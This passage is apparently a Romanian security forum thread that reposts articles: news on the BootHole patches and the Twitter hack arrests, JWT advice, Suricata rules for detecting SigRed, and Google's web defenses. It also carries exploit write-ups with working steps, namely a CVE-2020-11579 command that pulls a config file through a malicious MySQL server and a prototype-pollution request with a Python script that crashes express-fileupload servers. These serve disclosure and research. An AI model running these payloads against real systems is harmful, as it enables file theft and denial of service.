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  1. Incearca "social engineering". Tu, ea sau cineva apropiat, incercati sa discutati cu individul respectiv si sa vedeti ce vrea si de ce face asta. Poate aflati cate ceva despre el sau poate se da de gol cine e.
  2. Red Hat and CentOS systems aren’t booting due to BootHole patches Well, you can't be vulnerable to BootHole if you can't boot your system. Jim Salter - 7/31/2020, 10:43 PM Enlarge / Security updates intended to patch the BootHole UEFI vulnerability are rendering some Linux systems unable to boot at all. Aurich Lawson 53 with 31 posters participating, including story author Share on Facebook Share on Twitter Early this morning, an urgent bug showed up at Red Hat's bugzilla bug tracker—a user discovered that the RHSA_2020:3216 grub2 security update and RHSA-2020:3218 kernel security update rendered an RHEL 8.2 system unbootable. The bug was reported as reproducible on any clean minimal install of Red Hat Enterprise Linux 8.2. Further Reading New flaw neuters Secure Boot, but there’s no reason to panic. Here’s why The patches were intended to close a newly discovered vulnerability in the GRUB2 boot manager called BootHole. The vulnerability itself left a method for system attackers to potentially install "bootkit" malware on a Linux system despite that system being protected with UEFI Secure Boot. RHEL and CentOS Unfortunately, Red Hat's patch to GRUB2 and the kernel, once applied, are leaving patched systems unbootable. The issue is confirmed to affect RHEL 7.8 and RHEL 8.2, and it may affect RHEL 8.1 and 7.9 as well. RHEL-derivative distribution CentOS is also affected. Red Hat is currently advising users not to apply the GRUB2 security patches (RHSA-2020:3216 or RHSA-2020:3217) until these issues have been resolved. If you administer a RHEL or CentOS system and believe you may have installed these patches, do not reboot your system. Downgrade the affected packages using sudo yum downgrade shim\* grub2\* mokutil and configure yum not to upgrade those packages by temporarily adding exclude=grub2* shim* mokutil to /etc/yum.conf. If you've already applied the patches and attempted (and failed) to reboot, boot from an RHEL or CentOS DVD in Troubleshooting mode, set up the network, then perform the same steps outlined above in order to restore functionality to your system. Other distributions Although the bug was first reported in Red Hat Enterprise Linux, apparently related bug reports are rolling in from other distributions from different families as well. Ubuntu and Debian users are reporting systems which cannot boot after installing GRUB2 updates, and Canonical has issued an advisory including instructions for recovery on affected systems. Although the impact of the GRUB2 bug is similar, the scope may be different from distribution to distribution; so far it appears the Debian/Ubuntu GRUB2 bug is only affecting systems which boot in BIOS (not UEFI) mode. A fix has already been committed to Ubuntu's proposed repository, tested, and released to its updates repository. The updated and released packages, grub2 (2.02~beta2-36ubuntu3.27) xenial and grub2 (2.04-1ubuntu26.2) focal, should resolve the problem for Ubuntu users. For Debian users, the fix is available in newly committed package grub2 (2.02+dfsg1-20+deb10u2). We do not have any word at this time about flaws in or impact of GRUB2 BootHole patches on other distributions such as Arch, Gentoo, or Clear Linux. Sursa: https://arstechnica.com/gadgets/2020/07/red-hat-and-centos-systems-arent-booting-due-to-boothole-patches/
  3. 17-Year-Old 'Mastermind', 2 Others Behind the Biggest Twitter Hack Arrested July 31, 2020Mohit Kumar A 17-year-old teen and two other 19 and 22-year-old individuals have reportedly been arrested for being the alleged mastermind behind the recent Twitter hack that simultaneously targeted several high-profile accounts within minutes as part of a massive bitcoin scam. According to the U.S. Department of Justice, Mason Sheppard, aka "Chaewon," 19, from the United Kingdom, Nima Fazeli, aka "Rolex," 22, from Florida and an unnamed juvenile was charged this week with conspiracy to commit wire fraud, conspiracy to commit money laundering, and the intentional access of a protected computer. Florida news channel WFLA has identified a 17-year-old teen named Graham Clark of Tampa Bay this week in connection with the Twitter hack, who probably is the juvenile that U.S. Department of Justice mentioned in its press release. Graham Clark has reportedly been charged with 30 felonies of communications and organized fraud for scamming hundreds of people using compromised accounts. On July 15, Twitter faced the biggest security lapse in its history after an attacker managed to hijack nearly 130 high-profile twitter accounts, including Barack Obama, Kanye West, Joe Biden, Bill Gates, Elon Musk, Jeff Bezos, Warren Buffett, Uber, and Apple. The broadly targeted hack posted similarly worded messages urging millions of followers of each profile to send money to a specific bitcoin wallet address in return for larger payback. "Everyone is asking me to give back, and now is the time," a tweet from Mr. Gates' account said. "You send $1,000; I send you back $2,000." The targeted profiles were also include some popular cryptocurrency-focused accounts, such as Bitcoin, Ripple, CoinDesk, Gemini, Coinbase, and Binance. The fraud scheme helped the attackers reap more than $100,000 in Bitcoin from several victims within just a few hours after the tweets were posted. As suspected on the day of the attack, Twitter later admitted that the attackers compromised its employees' accounts with access to the internal tools and gained unauthorized access to the targeted profiles. In its statement, Twitter also revealed that some of its employees were targeted using a spear-phishing attack through a phone, misleading "certain employees and exploit human vulnerabilities to gain access to our internal systems." Twitter said a total of 130 user accounts were targeted in the latest attack, out of which only 45 verified accounts were exploited to publish scam tweets. It also mentioned that the attackers accessed Direct Message inboxes of at least 36 accounts, whereas only eight accounts' information was downloaded using the "Your Twitter Data" archive tool. "There is a false belief within the criminal hacker community that attacks like the Twitter hack can be perpetrated anonymously and without consequence," said U.S. Attorney Anderson. "Today's charging announcement demonstrates that the elation of nefarious hacking into a secure environment for fun or profit will be short-lived. Criminal conduct over the Internet may feel stealthy to the people who perpetrate it, but there is nothing stealthy about it. In particular, I want to say to would-be offenders, break the law, and we will find you." "We've significantly limited access to our internal tools and systems. Until we can safely resume normal operations, our response times to some support needs and reports will be slower," Twitter added. This is a developing story and will be updated as additional details become available. Found this article interesting? Follow THN on Facebook, Twitter  and LinkedIn to read more exclusive content we post. Sursa: https://thehackernews.com/2020/07/twitter-hacker-arrested.html
  4. @andr82 - Cea clasica: session cookies. Cam astea ar fi, nu am alte idei. Dar pana la urma depinde de cum vrea fiecare developer. In trecut erau aplicatii care setau drept cookie user si parola si aceea era autentificarea...
  5. Da, oricum e destul de RAR SAML. Si pentru JWT sunt niste reguli: - De preferat criptarea asimetrica sau un secret "puternic" pe ciptarea simetrica - De generat JWT dupa ce userul s-a logat doar, nu de exemplu la signup - De verificat intotdeauna semnatura si nu permis mizeriile cu algorithm 'none' - De nu pus date sensitive prin JWT - De ne reutilizarea se secretului pentru a genera JWT-uri diferite, pentru aplicatii diferite, ca apoi cineva sa le poata interschimba - De implementat corect flow-urile - De evitat open redirect, mai ales in redirect_url - De implementat protectiile anti-CSRF Desi lista pare lunga, mi se pare mult mai simplu, practic si eficient decat SAML.
  6. Ar fi si cazul, ar trebui sa treaba pe un Linux embedded ceva. Oricum, e hardcore ce au facut aici: "To analyze whether the module exists a chip debug port, we scan the SoC with X-Ray to figure out the pins, which avoided damage caused by disassembling the equipment."
  7. Seeing (Sig)Red Reading time ~13 min Posted by Felipe Molina de la Torre on 20 July 2020 Categories: Blue team, Digital forensics, Suricata After the SigRed (CVE-2020-1350) write-up was published by Check Point, there was enough detailed information for the smart people, like Hector and others of the Twitterverse (careful with the fake PoC!), to swiftly write a proof of concept to crash Windows DNS. CP did not publish enough details about how to convert this into an RCE, so it looks like a PoC to execute code is still going to take some time to surface. In this post I will describe how I created a Suricata rule to detect exploitation attempts of CVE-2020-1350. As Windows exploitation and debugging is not my strong point, I decided to jump onto the defensive side of the vulnerability to help blue teams and sysadmins detect the attack before their Domain Controllers catch fire. I started by reading the Check Point post, and others, detailing the vulnerability to get as much detail as possible to create a Suricata IDS signature with which to detect exploitation attempts on your network. I chose Suricata because it is a highly popular network IDS solution, its open source and it is easy to install and configure. This post will not describe the details of the vulnerability itself, as the original Check Point post and all the subsequent articles published on the Internet should be sufficient for anyone to understand the inner workings of it. Thus, I will assume you have read the details and understand the exploitation vector. Suricata Rules Syntax Before delving into the details, we should first understand the syntax of a Suricata rule. This is an example extracted from their documentation: drop tcp $HOME_NET any -> $EXTERNAL_NET any (msg:”ET TROJAN Likely Bot Nick in IRC (USA +..)”; flow:established,to_server; flowbits:isset,is_proto_irc; content:”NICK “; pcre:”/NICK .*USA.*[0-9]{3,}/i”; reference:url,doc.emergingthreats.net/2008124; classtype:trojan-activity; sid:2008124; rev:2;) In this example, red is the action, green is the header and blue are the options. The action determines what happens when the signature matches and can be “pass”,”drop”,”reject” or “alert”. Check here for more information about the behaviour of each one. The header defines the protocol, IP addresses, ports and direction of the rule. The options section defines the specifics of the rule. To detect SigRed, we are going to work primarily with the last two sections of the rule, the header and the options, leaving the action fixed as an “alert“. Bear in mind that Suricata can be configured as an in-line IPS, so you can also specify the “drop” action to protect your corporate Windows DNS servers from SigRed attacks. Creating the Rules Reading the original blog post describing the vulnerability, one could infer the following properties that a malicious DNS connection will have: First suspicious packet: Description: As DNS answers over UDP have a 512 byte limit for the length of the payload, the malicious DNS server would need to initiate the conversation over TCP. This is indicated by the DNS flag TC. Therefore, the first suspicious packet will be a SIG answer, coming from the external network (i.e. Internet) directed to your corporate DNS servers with the “answer” and “TC” flags set. Protocol/Layer: DNS over UDP. Source: Coming from port 53 (DNS answer) for an IP on the external network Destination: To any port of any of our Windows DNS servers. Flow: Communications established and flowing from the malicious DNS (server) to the victim DNS (client). DNS Flags: ANSWER (bit 1) and TC (bit 6) flags enabled. Answer Type: A SIG (0x18) IN (0x01) answer. Viewing this in wireshark may look as follows: Second (more) suspicious packet: Description: A DNS SIG IN answer over TCP packet with an excessive packet length and a compressed signer name pointing to the following byte coming from the external network (i.e. Internet) directed to your corporate DNS servers. Protocol/Layer: DNS over TCP. Source: Coming from port 53 (DNS answer) of an IP on the external network. Destination: To any port of any of our Windows DNS servers. Flow: Communications established and flowing from the malicious DNS (server) to the victim DNS (client). DNS Flags: ANSWER (bit 1) enabled. Answer Type: A SIG (0x18) IN (0x01) answer. Packet Length: Greater than 65280 bytes (0xFF00). Compressed Signer Name: Pointer to the first character of the queried domain name which is usually the byte 0xC00D, or any other value greater than 0x0D pointing to other characters of the queried domain name. Hint: Take a look here to understand how message compression works on DNS to understand why it specifically has to be this value. Again, within wireshark that may look as follows: Example of the second malicious DNS packet observed in the network on an RedSig attack Knowing what the suspicious packets may look like. we can translate this into Suricata syntax. (This is a process that took me a while, as it was the first time I was dealing with these kind of rules and I had to make my way around the Suricata documentation). In summary for the first approach, the rules for the two packets could be translated into the following (note the corresponding colours of the rule to the description above): First Rule: alert dns $EXTERNAL_NET 53 -> $DNS_SERVERS any (msg:”Windows DNS Exploit (TC header)”;flow:established,to_client;classtype:denial-of-service;byte_test:2,&,0x82,2;content: “|00 00 18 00 01|”;within: 120;reference:cve,2020-1350;sid:666661;rev:1;) Second Rule: alert tcp $EXTERNAL_NET 53 -> $DNS_SERVERS any (msg:”Windows DNS Exploit (Compressed SIG record)”;flow:established,to_client;classtype:denial-of-service;byte_test:2,>,0xFF00,0;byte_test:2,&,0x80,4;content: “|00 00 18 00 01|”;within: 120;content:”|c0 0d|”;reference:cve,2020-1350;sid:666662;rev:2;) For these rules to work in your environment, you will need to open your “suricata.yaml” configuration file and add an array with your corporate DNS IP addresses in the variable $DNS_SERVERS: Defining our internal DNS IP addresses After adding your DNS IP addresses here, save these two rules in a text file called “sigred.rules”, save them in the default “rules” folder usually located at “/etc/suricata/rules” and enable them in the “suricata.yaml” configuration file under the “rule-files” section: Multiple SigRed rules added to our Suricata installation To test whether the rules are working or not, one can run the Suricata client against PoC traffic captures. I tested these rules against three different traffic captures. The first one was the PCAP found in the first PoC written by Maxploit, the second one was the PoC written by Hector (thank you for the pcap), and the third one was the traffic capture I grabbed myself from one of our Jumpboxes. To test your rules against a PCAP, execute the following command on your Suricata box: suricata -r /home/user/sigred-dos-poc.pcapng -l /var/log/suricata/ Detection of SigRed exploit with Suricata I noticed two limitations in this first approach when writing the Suricata rules. The first limitation was that the first rule alone will trigger a fair amount of false positives on the network, as transitioning to DNS over TCP with SIG requests is not uncommon. So, the rule should be useful when triggered with the second one. If you only have the first rule triggered in your Suricata setup it may be worth it to investigate this as a potential incident (especially in the first weeks since the publication of the vulnerability), but if you have both rules configured you can be almost sure someone is doing nasty things in your corporate network. The second limitation is that we are making our rule to search for a hard-coded compressed Signer’s name with the value “0xC00D“. This compressed signer’s name is pointing to the first character of the queried domain – this is, the “9” in the domain name “9.ibrokethe.net” – to trigger the heap overflow (see “DNS Pointer Compression – Less is More” on the CP blog post). This is the value hard-coded in the Check Point blog post and the Maxpl0it PoC, but in reality you can point to other characters in the string and the exploit will work and not be detected by our Suricata rule. To tackle the first limitation, we can make a link between our two rules for Suricata IDS. To do so, we can introduce a new rule option called xbits. With this option, we set a flag (tc_requested) when the first rule is triggered. This flag can then later be queried by the second rule with the “isset” operator. If the flag is set, then the second rule will trigger an alert. If the flag is not set, the second rule will not trigger an alert. Introducing the xbits option we make our rules tightly coupled with each other, and the degree of certainty that we are facing the SigRed exploit is significantly increased. To tackle the second limitation, we should make our Suricata rule aware of other valid compressed names that will trigger the vulnerability, such as “0xC00E”, “0xC00F”, “0xC010”, etc. Thus, we can add a byte_test comparison to look for greater values than “0x0c” in the second byte of the compressed name. After addressing these two limitations, we end up with the following rules (note the red colour part of the rule to address the false positive limitation by combining the rules and the blue colour part of the rule to address other valid values of compressed names): alert dns $EXTERNAL_NET 53 -> $DNS_SERVERS any (msg:”Windows DNS Exploit (TC header)”;flow:established,to_client;classtype:denial-of-service;byte_test:2,&,0x82,2;content: “|00 00 18 00 01|”;within: 120;xbits:set,tc_requested,track ip_pair;noalert;reference:cve,2020-1350;sid:666661;rev:2;) alert tcp $EXTERNAL_NET 53 -> $DNS_SERVERS any (msg:”Windows DNS SigRed Exploit (Compressed SIG record)”;flow:established,to_client;classtype:denial-of-service;byte_test:2,>,0xFF00,0;byte_test:2,&,0x80,4;content:”|00 00 18 00 01|”;within:120;content:”|c0|”;within:31;byte_test:1,>,0x0c,0,relative;xbits:isset,tc_requested,track ip_pair;reference:cve,2020-1350;sid:666662;rev:3;) With these two rules, you would learn about the victim DNS server being targeted in the attack and the external malicious DNS server sending the payload. Once you have this information you would be able to take further incident response measures, such as blocking the malicious domain on your perimeter. With these two rules you will not get information about how your internal DNS got targeted by this exploit. Assuming we have already detected with the two previous rules the malicious domain name, e.g. “ibrokethe.net”, we could identify the attacker or victim of the attack by tweaking two more Suricata rules as follows: The first one to see if an insider is manually trying to attack corporate DNS servers, that is, manually executing a query to the malicious DNS server using something like nslookup or dig. In this case, one would see a DNS query packet trying to resolve the SIG (0X18) IN (0x01) entry of a malicious domain (ibrokethe.net), directed to our corporate DNS server: DNS SIG IN query to resolve the malicious domain name The second to see if an employee has been a target of an attack like the one described in the original Check Point post by smuggling DNS data inside of the HTTP protocol (see “Triggering From the Browser” section of the CP post). In this case, one would see a malformed DNS packet as follows : After identifying all of the relevant properties that a malicious DNS packet could have, we can create the following two rules to detect the insider or victim of this attack to a specific domain that you have detected (note the corresponding explanatory colours in the rule): alert dns $HOME_NET any -> $DNS_SERVERS 53 (msg:”Windows SigRed DNS Exploit (Insider Identification)”;classtype:denial-of-service;flow:to_server;byte_test:1,!&,0xF8,2;content:”|09|ibrokethe|03|net”;content:”|00 00 18 00 01|”;within: 5;reference:cve,2020-1350;sid:666663;rev:1;) alert tcp $HOME_NET any -> $DNS_SERVERS 53 (msg:”Windows SigRed DNS Exploit (Victim Identification)”;classtype:denial-of-service;flow:to_server;byte_test:1,!&,0xF8,4;content:”|50 4f 53 54 20 2f|”;offset:0;depth:6;content:”|09|ibrokethe|03|net”;distance:20567;within:100;content:”|00 00 18 00 01|”;within:5;reference:cve,2020-1350,sid:666664;rev:1;) With these four rules we would be able to identify a SigRed attack on a network and obtain the following details: The source IP address where the attack originated from and potentially whether it was a victim of the attack (rule 666664) or was active part in the attack (rule 666663). The target DNS name for the attack (rules 666661 and 666662) The malicious domain (rules 666661 and 666662). The malicious external DNS server (rules 666661 and 666662). I hope these rules are useful for someone out there and helps protect your corporate networks. Good luck catching the bad guy! Bibliography & Resources https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/ https://www.ietf.org/rfc/rfc1035.txt http://www.tcpipguide.com/free/t_DNSNameNotationandMessageCompressionTechnique-2.htm https://github.com/maxpl0it/CVE-2020-1350-DoS https://www.immagic.com/eLibrary/ARCHIVES/GENERAL/WIKIPEDI/W120423L.pdf https://suricata.readthedocs.io/en/suricata-5.0.3/ https://www.securityartwork.es/2013/02/21/snort-byte_test-for-dummies-2/ Twitter Sursa: https://sensepost.com/blog/2020/seeing-sigred/
  8. Towards native security defenses for the web ecosystem July 22, 2020 Posted by Artur Janc and Lukas Weichselbaum, Information Security Engineers With the recent launch of Chrome 83, and the upcoming release of Mozilla Firefox 79, web developers are gaining powerful new security mechanisms to protect their applications from common web vulnerabilities. In this post we share how our Information Security Engineering team is deploying Trusted Types, Content Security Policy, Fetch Metadata Request Headers and the Cross-Origin Opener Policy across Google to help guide and inspire other developers to similarly adopt these features to protect their applications. History Since the advent of modern web applications, such as email clients or document editors accessible in your browser, developers have been dealing with common web vulnerabilities which may allow user data to fall prey to attackers. While the web platform provides robust isolation for the underlying operating system, the isolation between web applications themselves is a different story. Issues such as XSS, CSRF and cross-site leaks have become unfortunate facets of web development, affecting almost every website at some point in time. These vulnerabilities are unintended consequences of some of the web's most wonderful characteristics: composability, openness, and ease of development. Simply put, the original vision of the web as a mesh of interconnected documents did not anticipate the creation of a vibrant ecosystem of web applications handling private data for billions of people across the globe. Consequently, the security capabilities of the web platform meant to help developers safeguard their users' data have evolved slowly and provided only partial protections from common flaws. Web developers have traditionally compensated for the platform's shortcomings by building additional security engineering tools and processes to protect their applications from common flaws; such infrastructure has often proven costly to develop and maintain. As the web continues to change to offer developers more impressive capabilities, and web applications become more critical to our lives, we find ourselves in increasing need of more powerful, all-encompassing security mechanisms built directly into the web platform. Over the past two years, browser makers and security engineers from Google and other companies have collaborated on the design and implementation of several major security features to defend against common web flaws. These mechanisms, which we focus on in this post, protect against injections and offer isolation capabilities, addressing two major, long-standing sources of insecurity on the web. Injection Vulnerabilities In the design of systems, mixing code and data is one of the canonical security anti-patterns, causing software vulnerabilities as far back as in the 1980s. It is the root cause of vulnerabilities such as SQL injection and command injection, allowing the compromise of databases and application servers. On the web, application code has historically been intertwined with page data. HTML markup such as <script> elements or event handler attributes (onclick or onload) allow JavaScript execution; even the familiar URL can carry code and result in script execution when navigating to a javascript: link. While sometimes convenient, the upshot of this design is that – unless the application takes care to protect itself – data used to compose an HTML page can easily inject unwanted scripts and take control of the application in the user's browser. Addressing this problem in a principled manner requires allowing the application to separate its data from code; this can be done by enabling two new security features: Trusted Types and Content Security Policy based on script nonces. Trusted Types Main article: web.dev/trusted-types by Krzysztof Kotowicz JavaScript functions used by developers to build web applications often rely on parsing arbitrary structure out of strings. A string which seems to contain data can be turned directly into code when passed to a common API, such as innerHTML. This is the root cause of most DOM-based XSS vulnerabilities. Trusted Types make JavaScript code safe-by-default by restricting risky operations, such as generating HTML or creating scripts, to require a special object – a Trusted Type. The browser will ensure that any use of dangerous DOM functions is allowed only if the right object is provided to the function. As long as an application produces these objects safely in a central Trusted Types policy, it will be free of DOM-based XSS bugs. You can enable Trusted Types by setting the following response header: We have recently launched Trusted Types for all users of My Google Activity and are working with dozens of product teams across Google as well as JavaScript framework owners to make their code support this important safety mechanism. Trusted Types are supported in Chrome 83 and other Chromium-based browsers, and a polyfill is available for other user agents. Content Security Policy based on script nonces Main article: Reshaping web defenses with strict Content Security Policy Content Security Policy (CSP) allows developers to require every <script> on the page to contain a secret value unknown to attackers. The script nonce attribute, set to an unpredictable number for every page load, acts as a guarantee that a given script is under the control of the application: even if part of the page is injected by an attacker, the browser will refuse to execute any injected script which doesn't identify itself with the correct nonce. This mitigates the impact of any server-side injection bugs, such as reflected XSS and stored XSS. CSP can be enabled by setting the following HTTP response header: This header requires all scripts in your HTML templating system to include a nonce attribute with a value matching the one in the response header: Our CSP Evaluator tool can help you configure a strong policy. To help deploy a production-quality CSP in your application, check out this presentation and the documentation on csp.withgoogle.com. Since the initial launch of CSP at Google, we have deployed strong policies on 75% of outgoing traffic from our applications, including in our flagship products such as GMail and Google Docs & Drive. CSP has mitigated the exploitation of over 30 high-risk XSS flaws across Google in the past two years. Nonce-based CSP is supported in Chrome, Firefox, Microsoft Edge and other Chromium-based browsers. Partial support for this variant of CSP is also available in Safari. Isolation Capabilities Many kinds of web flaws are exploited by an attacker's site forcing an unwanted interaction with another web application. Preventing these issues requires browsers to offer new mechanisms to allow applications to restrict such behaviors. Fetch Metadata Request Headers enable building server-side restrictions when processing incoming HTTP requests; the Cross-Origin Opener Policy is a client-side mechanism which protects the application's windows from unwanted DOM interactions. Fetch Metadata Request Headers Main article: web.dev/fetch-metadata by Lukas Weichselbaum A common cause of web security problems is that applications don't receive information about the source of a given HTTP request, and thus aren't able to distinguish benign self-initiated web traffic from unwanted requests sent by other websites. This leads to vulnerabilities such as cross-site request forgery (CSRF) and web-based information leaks (XS-leaks). Fetch Metadata headers, which the browser attaches to outgoing HTTP requests, solve this problem by providing the application with trustworthy information about the provenance of requests sent to the server: the source of the request, its type (for example, whether it's a navigation or resource request), and other security-relevant metadata. By checking the values of these new HTTP headers (Sec-Fetch-Site, Sec-Fetch-Mode and Sec-Fetch-Dest), applications can build flexible server-side logic to reject untrusted requests, similar to the following: We provided a detailed explanation of this logic and adoption considerations at web.dev/fetch-metadata. Importantly, Fetch Metadata can both complement and facilitate the adoption of Cross-Origin Resource Policy which offers client-side protection against unexpected subresource loads; this header is described in detail at resourcepolicy.fyi. At Google, we've enabled restrictions using Fetch Metadata headers in several major products such as Google Photos, and are following up with a large-scale rollout across our application ecosystem. Fetch Metadata headers are currently sent by Chrome and Chromium-based browsers and are available in development versions of Firefox. Cross-Origin Opener Policy Main article: web.dev/coop-coep by Eiji Kitamura By default, the web permits some interactions with browser windows belonging to another application: any site can open a pop-up to your webmail client and send it messages via the postMessage API, navigate it to another URL, or obtain information about its frames. All of these capabilities can lead to information leak vulnerabilities: Cross-Origin Opener Policy (COOP) allows you to lock down your application to prevent such interactions. To enable COOP in your application, set the following HTTP response header: If your application opens other sites as pop-ups, you may need to set the header value to same-origin-allow-popups instead; see this document for details. We are currently testing Cross-Origin Opener Policy in several Google applications, and we're looking forward to enabling it broadly in the coming months. COOP is available starting in Chrome 83 and in Firefox 79. The Future Creating a strong and vibrant web requires developers to be able to guarantee the safety of their users' data. Adding security mechanisms to the web platform – building them directly into browsers – is an important step forward for the ecosystem: browsers can help developers understand and control aspects of their sites which affect their security posture. As users update to recent versions of their favorite browsers, they will gain protections from many of the security flaws that have affected web applications in the past. While the security features described in this post are not a panacea, they offer fundamental building blocks that help developers build secure web applications. We're excited about the continued deployment of these mechanisms across Google, and we're looking forward to collaborating with browser makers and the web standards community to improve them in the future. For more information about web security mechanisms and the bugs they prevent, see the Securing Web Apps with Modern Platform Features Google I/O talk (video). Sursa: https://security.googleblog.com/2020/07/towards-native-security-defenses-for.html
  9. Malware Reverse Engineering Handbook Authors: Ahmet BalciDan UngureanuJaromir Vondruška Files: PDF Malware is a growing threat which causes considerable cost to individuals, companies and institutions. Since basic signature-based antivirus defences are not very useful against recently emerged malware threats or APT attacks, it is essential for an investigator to have the fundamental skill set in order to analyse and mitigate these threats. This handbook by CCDCOE Technology Branch researchers gives an overview of how to analyse malware executables that are targeting the Windows platform. The authors are presenting the most common techniques used in malware investigation including set up of LAB environment, network analysis, behavioural analysis, static and dynamic code analysis. The reader will become familiar with disassemblers, debuggers, sandboxes, system and network monitoring tools. Incident response and collaboration tools are also introduced. Advanced techniques are out of the scope of this handbook as it can be considered as the first steps in investigating and dealing with malware. This research paper is an independent product of the CCDCOE and does not represent the official policy or position of NATO or any of the CCDCOE´s Sponsoring Nations. The NATO Cooperative Cyber Defence Centre of Excellence (NATO CCDCOE) is a NATO-accredited knowledge hub, research institution, and training and exercise facility. The Tallinn-based international military organisation focuses on interdisciplinary applied research, as well as consultations, training and exercises in the field of cyber security. Keywords: malware, debugger, IDAPro, static, dynamic, collaboration Sursa: https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
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  10. Download: https://skygo.360.cn/archive/Security-Research-Report-on-Mercedes-Benz-Cars-en.pdf
  11. Sometimes they come back: exfiltration through MySQL and CVE-2020-11579 Posted bypolict 28 July 2020 2 Comments Let’s jump straight to the strange behavior: up until PHP 7.2.16 it was possible by default to exfiltrate local files via the MySQL LOCAL INFILE feature through the connection to a malicious MySQL server. Considering that the previous PHP versions are still the majority in use, these exploits will remain useful for quite some time. Like many other vulnerabilities, after reading about this quite-unknown attack technique (1, 2), I could not wait to find a vulnerable software where to practice such unusual dynamic. The chance finally arrived after a network penetration test where @smaury encountered PHPKB, a knowledge-base software written in PHP which he felt might be interesting to review, and that was my trigger. 😏 After deploying it and having a look at the source code, I noticed that during the installation it was possible to test the database connection before actually starting to use it. After going back to review my Burp HTTP history, I discovered that the API endpoint wasn’t protected or removed after the configuration was completed, and hence it remained available for any unauthenticated user forever after. A PHPKB patch was released shortly after my report and MITRE assigned it CVE-2020-11579. Moving on to the exploitation technique, despite it being around for quite some time the malicious servers available weren’t neither really debug-friendly nor standalone. That’s why I chose to invest some time to write one which met both those requirements — the result is available on GitHub. The script can work in two main modes: server-only and exploit. The exploit mode just adds the HTTP GET request needed to trigger CVE-2020-11579, while the server-only exposes the malicious MySQL instance and waits for connections. For example, we can now exfiltrate an arbitrary file from a vulnerable PHPKB host in just one command: $ ./CVE-2020-11579.py -rh -lh -f '../../admin/include/configuration.php' 2020-04-20 13:37:42,666 - CRITICAL - Successfully extracted file from [...] // Database Settings // MySQL Database Settings $mySQLServer = ''; $mySQLUsername = 'root'; $mySQLPassword = 'dadada'; $mySQLDatabase = 'phpkbv9'; [...] 1 2 3 4 5 6 7 8 9 10 11 12 $ ./CVE-2020-11579.py -rh -lh -f '../../admin/include/configuration.php' 2020-04-20 13:37:42,666 - CRITICAL - Successfully extracted file from [...] // Database Settings // MySQL Database Settings $mySQLServer = ''; $mySQLUsername = 'root'; $mySQLPassword = 'dadada'; $mySQLDatabase = 'phpkbv9'; [...] Example debug run I hope it will help you exploit more easily such vulnerabilities in the future — until next time! 🤟🏻 Sursa: https://www.shielder.it/blog/mysql-and-cve-2020-11579-exploitation/
  12. How to Write Shellcode 5 videoclipuri 169 de vizionări Ultima actualizare pe 22 iul. 2020 If you have ever struggled or were just curious how a hacker writes shellcode to exploit a vulnerability, then you're in the right place! Evan Walls (@fuzzwalls on Twitter), vulnerability researcher & exploit developer at Tactical Network Solutions, will walk you through a detailed step-by-step process in developing MIPS shellcode. We think this is one of the BEST shellcode tutorials out there. We hope you agree! Enjoy! The Team at Tactical Network Solutions https://www.tacnetsol.com Sursa:
  13. Real-world JS 1 Real-world JS Vulnerabilities Series 1 express-fileupload JavaScript Vulnerabilities (prototype pollution, redos, type confusion etc) is a popular topic in recent security competition such as CTFs But, there seems to be a lack of real-world research for them, so I started research to find it and share data. This research aims to improve the nodejs ecosystem security level. This vulnerability is in the first case about the express-fileupload. As shown in the name, this module provide file upload function as express middleware Until today, this express-fileupload has been downloaded a total of 7,193,433 times. The express-fileupload module provides several options for uploading and managing files in the nodejs application. Among them, the parseNested make argument flatten. Therefore, if we provide {"a.b.c": true} as an input, Internally, It will used as {"a": {"b": {"c": true}}} 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 busboy.on('finish', () => { debugLog(options, `Busboy finished parsing request.`); if (options.parseNested) { req.body = processNested(req.body); req.files = processNested(req.files); } if (!req[waitFlushProperty]) return next(); Promise.all(req[waitFlushProperty]) .then(() => { delete req[waitFlushProperty]; next(); }).catch(err => { delete req[waitFlushProperty]; debugLog(options, `Error while waiting files flush: ${err}`); next(err); }); }); So, if options.parseNested has a value. If calls processNested Function, and argument will be req.body and req.files. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 function processNested(data){ if (!data || data.length < 1) return {}; let d = {}, keys = Object.keys(data); for (let i = 0; i < keys.length; i++) { let key = keys[i], value = data[key], current = d, keyParts = key .replace(new RegExp(/\[/g), '.') .replace(new RegExp(/\]/g), '') .split('.'); for (let index = 0; index < keyParts.length; index++){ let k = keyParts[index]; if (index >= keyParts.length - 1){ current[k] = value; } else { if (!current[k]) current[k] = !isNaN(keyParts[index + 1]) ? [] : {}; current = current[k]; } } } return d; }; The above is the full source of the processNested function. Here provides flatten function for key, of req.files. It split the key value of the first argument of object obtained through Object.keys(data) by . and makes loop using that, and refers/define object repeatedly. 1 2 3 4 let some_obj = JSON.parse(`{"__proto__.polluted": true}`); processNested(some_obj); console.log(polluted); // true! In this function, prototype pollution vulnerability is caused by the above usage. Therefore, if we can put manufactured objects in this function, it can affect the express web application. 1 2 3 4 5 6 7 8 9 10 11 const express = require('express'); const fileUpload = require('express-fileupload'); const app = express(); app.use(fileUpload({ parseNested: true })); app.get('/', (req, res) => { res.end('express-fileupload poc'); }); app.listen(7777) Therefore, configure and run the express server using express-fileupload in the above form. 1 2 3 4 5 6 7 8 9 POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=--------1566035451 Content-Length: 123 ----------1566035451 Content-Disposition: form-data; name="name"; filename="filename" content ----------1566035451-- And I send the above POST request. Then we can confirm that the some object is given as the argument of processNested function. (I added code for debug) 1 2 3 4 5 6 7 8 9 POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=--------1566035451 Content-Length: 137 ----------1566035451 Content-Disposition: form-data; name="__proto__.toString"; filename="filename" content ----------1566035451-- Let’s try prototype pollution If we send this with the name changed to __proto__.toString. An object with the key __proto__.toString is created and call processNested function. and pollute toString method of Object.prototype. And from the moment this value is covered with a object that is not a function. The express application makes error for every request ! 1 2 3 var isRegExp = function isRegExp(obj) { return Object.prototype.toString.call(obj) === '[object RegExp]'; }; In the qs module used within the express, location.search part of the HTTP request will be parsed and make it to req.query object. In that logic, qs uses Object.prototype.toString. Therefore, this function called for every request in the express application (even if there is no search part) If Object.prototype.toString can be polluted, this will cause an error. and for every request, express always returns 500 error. 1 2 3 import requests res = requests.post('http://p6.is:7777', files = {'__proto__.toString': 'express-fileupload poc'}); Actually, if we use script above to pollute the prototype of server For all requests, the server returns either 